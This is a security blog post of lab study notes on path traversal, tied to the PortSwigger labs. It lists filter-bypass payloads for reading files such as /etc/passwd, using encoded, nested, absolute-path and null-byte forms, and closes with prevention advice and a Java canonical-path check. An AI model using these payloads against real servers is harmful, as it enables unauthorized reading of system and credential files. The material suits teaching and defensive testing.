🔐 Path Traversal: Notes, Techniques & Attack Types


🚀 What is Path Traversal?
Path Traversal, also known as Directory Traversal, is a web vulnerability that allows attackers to access files outside of the intended directory.
🎯 Objective: Read sensitive files (e.g. /etc/passwd
, win.ini
) or even write files to gain code execution.
🧩 How It Works
Example scenario:
<img src="/loadImage?filename=218.png">
Backend resolves:
/var/www/images/218.png
An attacker sends:
/loadImage?filename=../../../etc/passwd
Backend resolves:
/var/www/images/../../../etc/passwd
💥 Result: Unauthorized access to system files!
🛠️ Bypass Techniques & Attack Variants
1. 🔁 Basic Traversal (Apprentice)
../../../etc/passwd
➡️ Classic directory stepping.
2. 🧬 Absolute Path Bypass
If traversal sequences are blocked:
/etc/passwd
➡️ Directly use absolute paths from filesystem root.
3. 🧩 Nested Traversal Sequences
When ../
gets stripped, try nested obfuscation:
....//....//etc/passwd
➡️ Reverts to ../../../etc/passwd
after naive filtering.
4. 🧪 Encoded Traversal (URL Tricks)
If filtering occurs before decoding:
%2e%2e%2f
→../
%252e%252e%252f
→ decoded twice to../
Unicode variants:
..%c0%af
..%ef%bc%8f
💡 Use Burp Intruder’s Fuzzing - Path Traversal
wordlist!
5. 📂 Start-of-Path Validation
If app checks input starts with /var/www/images
:
/var/www/images/../../../etc/passwd
➡️ Bypasses start-check and climbs out using ..
.
6. 🖼️ File Extension + Null Byte Bypass
If app expects .png
at the end:
../../../etc/passwd%00.png
➡️ %00
null byte truncates the string (in older systems/languages like PHP < 5.3).
🧱 How to Prevent Path Traversal
✅ Best Practices
❌ Avoid user-supplied file paths.
✅ Use a whitelist of file names or IDs.
✅ Canonicalize and validate the final path.
🧰 Example in Java
File file = new File(BASE_DIRECTORY, userInput);
if (file.getCanonicalPath().startsWith(BASE_DIRECTORY)) {
// Safe to use the file
}
🔍 Summary: Path Traversal Labs (PortSwigger)
Lab Type | Concept |
🧠 Apprentice | Basic file traversal |
🔓 Practitioner 1 | Absolute path bypass |
🎭 Practitioner 2 | Nested traversal to bypass sanitization |
🧪 Practitioner 3 | Encoded traversal sequences |
🛤️ Practitioner 4 | Start-of-path validation bypass |
🧊 Practitioner 5 | Null byte + file extension restriction bypass |
💡 Pro Tips
Combine multiple evasion techniques when needed.
Try traversal in:
URL paths
Query params
Multipart forms
JSON inputs
Headers (like X-File-Path)
🧙♂️ Mastering path traversal opens the door to the server’s soul. Just make sure you’re wearing the white hat while you do it. 🕊️
Subscribe to my newsletter
Read articles from Ayush Sharma directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
